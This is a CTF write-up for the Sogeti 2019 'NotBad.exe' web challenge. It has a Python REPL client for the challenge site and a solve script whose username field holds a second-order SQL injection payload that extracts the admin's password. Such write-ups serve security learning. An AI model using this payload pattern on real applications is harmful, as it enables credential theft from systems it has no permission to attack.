This is the code used to solve the NotBad.exe web challenge from Sogeti CTF qualifications 2019.
There is a second order SQL injection in username, while retreiving current user's notes.
The python script is a REPL shell you can script to test your payloads.
$ ./notbad.py < solve.cmd| #!/usr/bin/env python3 | |
| import requests | |
| import sys | |
| import argparse | |
| class Session: | |
| URL = 'http://quals.shadow-league.org:8001' | |
| URL_INDEX = f'{URL}/index.php' | |
| URL_REGISTER = f'{URL}/register.php' | |
| URL_HOME = f'{URL}/home.php' | |
| def __init__(self, phpsessid=None): | |
| self._username = None | |
| self._password = 'foobar' | |
| self._session = requests.session() | |
| self._verbose = False | |
| if phpsessid is not None: | |
| self._session.cookies['PHPSESSID'] = phpsessid | |
| def _display(self, result): | |
| sys.stdout.buffer.write(result.content.rstrip()) | |
| print() | |
| def _get(self, *args, **kwargs): | |
| result = self._session.get(*args, **kwargs) | |
| if self._verbose: | |
| self._display(result) | |
| return result | |
| def logout(self): | |
| self._get(f'{self.URL_HOME}', params={'logout': '1'}) | |
| def create_user(self, username=None): | |
| if username is not None: | |
| self._username = username | |
| self._get( | |
| self.URL_REGISTER, | |
| params={ | |
| 'username': self._username, | |
| 'password': self._password | |
| }) | |
| def login_user(self, username=None): | |
| if username is not None: | |
| self._username = username | |
| self._get( | |
| self.URL_INDEX, | |
| params={ | |
| 'username': self._username, | |
| 'password': self._password | |
| }) | |
| def add_note(self, note): | |
| self._get(self.URL_HOME, params={'note': note}) | |
| def get_notes(self): | |
| self._display(self._get(self.URL_HOME)) | |
| def set_username(self, username): | |
| self._username = username | |
| def set_password(self, password): | |
| self._password = password | |
| def set_verbose(self, args='1'): | |
| self._verbose = bool(int(args)) | |
| def set_phpsessid(self, phpsessid): | |
| self._session.cookies['PHPSESSID'] = phpsessid | |
| def show(self): | |
| for attr in ['username', 'password', 'verbose']: | |
| print(f'{attr} = {getattr(self, "_" + attr)!r}') | |
| print(f'PHPSESSID = {self._session.cookies.get("PHPSESSID", None)!r}') | |
| def execute(session, line): | |
| command = line.split()[0] | |
| if len(line) > len(command) + 1: | |
| args = [line[len(command) + 1:]] | |
| else: | |
| args = [] | |
| callback = getattr(session, command, lambda *_: print('Command not found')) | |
| try: | |
| callback(*args) | |
| except Exception as exc: | |
| print(exc) | |
| def main(): | |
| parser = argparse.ArgumentParser() | |
| parser.add_argument('phpsessid', help='PHPSESSID', nargs='?', default=None) | |
| args = parser.parse_args() | |
| session = Session(args.phpsessid) | |
| while True: | |
| try: | |
| line = input('$ ').strip() | |
| except EOFError: | |
| break | |
| if line: | |
| execute(session, line) | |
| if __name__ == '__main__': | |
| main() |
| logout | |
| create_user jexistepasdutout' uNiOn seLeCt password FROM user where username='admin'-- . | |
| login_user | |
| get_notes |